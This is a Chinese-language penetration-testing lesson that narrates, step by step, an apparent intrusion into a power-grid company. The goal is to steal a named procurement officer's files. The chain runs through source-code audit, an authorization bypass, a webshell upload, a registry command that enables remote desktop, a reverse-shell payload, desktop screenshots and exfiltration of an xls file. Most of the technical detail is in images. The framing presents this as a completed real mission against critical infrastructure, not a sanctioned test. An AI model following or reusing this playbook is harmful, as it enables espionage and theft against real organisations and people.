# 第四课：Asp代码审计--项目实战2

## 0x00 任务背景：

需要得知周某某的今年采购的其中一个项目具体信息，目前已知该成员是xxx电网。负责丰满大坝的采购人员。整体思路如下：

* 找到开发公司 -> 得到源码 -> 审计问题 -> 得到shell -> 拿到服务器 ->
* 得到域控（或者终端管理） -> 得到个人机 -> 下载任务文件。

得知该电网公司电网相关网站是某公司出品，得到某公司对外宣传网站，并且得到该公司服务器权限，下载源码模板。

## 0x01 源码审计：

全局共计2个主要文件，分别是Function.asp，Startup.asp。

### 1、Function.asp

后台验证项：

* 来源验证：  

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrC4yScfRoNAxBrw%2Ff3d00f2e404aed2ace94202fad9196e1.jpg?generation=1551060435416699\&alt=media)

* 注入验证：（目标服务器waf，遂放弃）  

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrC6TZYM8MamOSYj%2F69876bba47950df97d93d92afc6db16e.jpg?generation=1551060429575273\&alt=media)

* 错误处理：  

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrC8GM_I9RpYBgt3%2F84612708e4d4f301fd655d48dc05267a.jpg?generation=1551060438264197\&alt=media)

* XSS字符处理：  

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCA_wY6P8ZVHr-h%2F2e3dd4d6f449ed860b790f4022b17291.jpg?generation=1551060443535631\&alt=media)

* 直接输入admin/下文件名处理：  

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCCXRrnDNrbp8bG%2F99f0ee3d3f7cd1ff3965502aff91bf1e.jpg?generation=1551060454065243\&alt=media)

* 目录生成：针对iis6以及iis7 php版本  

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCEewY1Iez76Mel%2F0a28fcfc4ba6e48eb857cc6b18e374e5.jpg?generation=1551060444163747\&alt=media)

### 2、Startup.asp

* 配置文件：当不可以执行的时候，是否可以备份出数据库，以便下载。  

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCGJ3J_SW9u79eg%2F47c48653bf1053dce5cee81320444f63.jpg?generation=1551060450110179\&alt=media)

* 关于新闻显示，全局incude head.asp  

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCIZAhQ-PSW5KMb%2F2275d60bafee51dd0adf82a42b9d079b.jpg?generation=1551060455142204\&alt=media)

### 3、check\_si.asp

其中 check\_si.asp 主要为防止注入

* Get注入  

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCKvSdcG43oA92V%2F398190858612948b7bee70a83bd145c2.jpg?generation=1551060426560324\&alt=media)

* Post 注入 新版本中加入post注入

过程中遇到服务器卡顿现象，也就是不清楚列名数，本地二分法测试如下：

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCM-dDeQ9tKlYiq%2F6c8bfb4c6de07bb3a93296288a15bbb0.jpg?generation=1551060459289206\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCOFkPOf5g2HosA%2F664d42e0571762dcbe9c25f6b43928b1.jpg?generation=1551060435526413\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCQzs5NgqzmDcWs%2Ff6c06ab3aefa6fffd987c9c7c90ed3e0.jpg?generation=1551060442787587\&alt=media)

### 4、database.asp

在 admin 目录下有个 database.asp 文件

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCSn2XDLvb3BwaQ%2F8271f2240cf178ee4a6fba221aeaedc2.jpg?generation=1551060428618349\&alt=media)

## 0x02 目标测试：

### 1、越权漏洞

根据以上信息，构造 referrer，构造参数，禁止js。产生出越权漏洞。

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCU7USgU-Ui0vze%2F5d66957a8586118f1ca10d23a0815a85.jpg?generation=1551060448938186\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCWqGeyHns1_YGo%2Fbff69d4a2c2a89ef8703ec99fd8fc8e3.jpg?generation=1551060426992753\&alt=media)

### 2、上传

根据越权漏洞，继续看upload.asp文件，允许匿名上传图片文件。在根据越权漏洞备份出webshell文件

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCYCh9RdNlHNno_%2F35aca0797d0299bb8c104d8be4bb3d6c.jpg?generation=1551060448245988\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrC_lxkDFHNw5CCb%2Fcc1c8766b6439d3e3c011ae8250066ad.jpg?generation=1551060447280811\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCbQoi1Jl-HUYdo%2F18f0b435a0ce1ccbb750a46e4b8df563.jpg?generation=1551060437250471\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCdA8bUffb6oy3u%2Ff1e074099cd43a5aa7057f57762b768f.jpg?generation=1551060427718634\&alt=media)

### 3、Get Shell

得到webshell

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCf0fqPHD4n_E5g%2F17ab0b85f64e92e48eaeeb32ef0f83aa.jpg?generation=1551060426300778\&alt=media)

### 4、开启 3389

对方没有开启远程桌面，开启：

```
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
```

### 5、Get Admin

通过该服务器得到mssql 数据库。得到终端管理权限。

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCheB75ZsW5pkOd%2Fae7a57c36b08aeb2176945f9e2072e6d.jpg?generation=1551060440760201\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCjZrWTAL6pG2Ae%2Fccc30aaffee18324e722073588b55c9b.jpg?generation=1551060443910431\&alt=media)

### 6、查找目标

查看在线机器，查找目标人物。

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrClKZCfuZb741yd%2F7e76f878e0182df67f910a01ccfa315c.jpg?generation=1551060446588018\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCnbDaAb8kI9_Vc%2F9906ffaba02adcbfef821163286b9104.jpg?generation=1551060426574245\&alt=media)

### 7、推送 Payload

推送payload 反弹。

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCpoS4f0LsLnxLp%2F09d81485119e132856f82757b8418f69.jpg?generation=1551060446508087\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCrXotLYdiWMucr%2F9938674149690d748853a0adf86e8fe3.jpg?generation=1551060453455182\&alt=media)

### 8、目标确认

确定是否为目标人物：采购员 桌面截图

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCtDgHF5VVtKSNH%2F545e99d1852fd486c825fc29598b0a0d.jpg?generation=1551060456223488\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCvelWfrg9nv0pM%2F04deeea27d64d51d2a0826d5d66b488d.jpg?generation=1551060436739550\&alt=media)

### 9、Download

按照任务 取得该人员的其中一个xls文件

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCx0calZ8B2a_Zg%2Ff67aea48578dce29a104af040d4cbe74.jpg?generation=1551060442840218\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCzchPC527oNQCo%2Fec0b56268a8689d959c65ca976e3cd90.jpg?generation=1551060425083329\&alt=media)

### 10、Mission Completed

任务完成。

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrD0PgxppHn8lfoM%2Fa90bcbaa1e1bb96809cfb8afc4a4dc22.jpg?generation=1551060426573236\&alt=media)

\--By Micropoor